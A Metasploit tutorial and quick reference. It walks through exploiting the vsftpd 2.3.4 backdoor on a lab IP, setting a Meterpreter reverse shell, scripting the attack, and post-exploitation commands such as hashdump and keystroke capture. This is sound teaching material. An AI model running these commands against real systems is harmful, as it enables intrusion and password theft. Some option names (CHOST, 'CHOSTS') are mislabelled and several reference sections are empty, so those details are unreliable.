Modules and Working of Metasploit framework

The Metasploit Framework is a powerful tool used by ethical hackers to identify, exploit, and assess vulnerabilities in systems. In this section, we will focus on the core components that make up the framework: exploits, payloads, scanners, and post-exploitation modules.

1. Understanding the Metasploit Workflow

We can categorize our workflow when performing an exploit using Metasploit into 5 parts: Recon, Exploit, Payload, Post-Exploitation, and Reporting. These are the steps you follow in any exploitation methodology. Below is a reference chart that will help you remember the functions of these steps and the actions they perform.

2. Starting Metasploit (On Kali)

msfconsole

You'll see the Metasploit banner and prompt:

msf6>

3. Searching for Exploits

Metasploit has a built-in search:

search vsftpd

Example output:

exploit/unix/ftp/vsftpd_234_backdoor

4. Selecting and Using an Exploit

use exploit/unix/ftp/vsftpd_234_backdoor

confirm with:

show options

You will see configurable parameters like:

RHOSTS - > Target IP
RPORT -> Target Port (default 21)

5. Setting Target Information

set RHOSTS 192.168.56.103

6. Choosing a Payload

A payload is code that runs after the exploit succeeds.

For remote shells:

set payload cmd/unix/interact

For Meterpreter on Windows targets:

set payload windows/meterpreter/reverse_tcp

7. Setting a Local Client (CHOST & CPORT)

set CHOST 192.168.56.102 # Your Kali IP
set CPORT 4444

8. Running the Exploit

exploit

If successful, you'll have a session:

[*] Command shell session 1 opened

9. Using Meterpreter

Try these commands once you get a successful session:

shell
sysinfo
getuid

You can explore the filesystem, capture keystrokes, or pivot to other hosts.

10. Using Auxiliary Modules (Scanners & Brute Force)

search scanner/ftp
use auxiliary/scanner/ftp/ftp_version
set RHOST 192.168.56.103
run

This identifies the FTP version without exploiting it.

11. Automating with Resource Scripts

Save a sequence of commands into a file:

nano ftp_attack.rc

Example:

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.56.103
set CHOSTS 192.168.56.102
set CPORT 4444
set payload cmd/unix/interact
exploit

Run it:

msfconsole -q -r ftp_attack.rc

Metasploit Quick Reference

It covers search syntax for finding exploits, payloads, and auxiliary modules, along with common exploit categories and payload examples.

1. Search Syntax

search type:exploit name:ftp
search type:auxiliary name:scanner
search type:payload platform:linux

Keywords you can use:

• type: → exploit, auxiliary, payload, post
• platform: → windows, linux, unix, multi, osx
• name: → protocol/service name (e.g., ssh, mysql)

2. Show Categories

show exploits # List all exploits
show payloads # List all payloads
show auxiliary # List all scanner/utility modules
show post # List all post-exploitation modules

3. Common Exploit Categories

4. Common Payloads

5. Auxiliary Modules (Scanning, Brute Force)

6. Post-Exploitation Commands (Meterpreter)

sysinfo # Get OS info
getuid # Get current user
hashdump # Dump password hashes
download <file> # Download file
upload <file> # Upload file
screenshot # Capture desktop

7. Choosing the Right Exploit

• Identify service & version → nmap -sV
• Search in Metasploit → search name:servicename version:versionnumber
• Check exploit info → info exploit/path
• Match compatible payloads → show payloads
• Test in lab before real target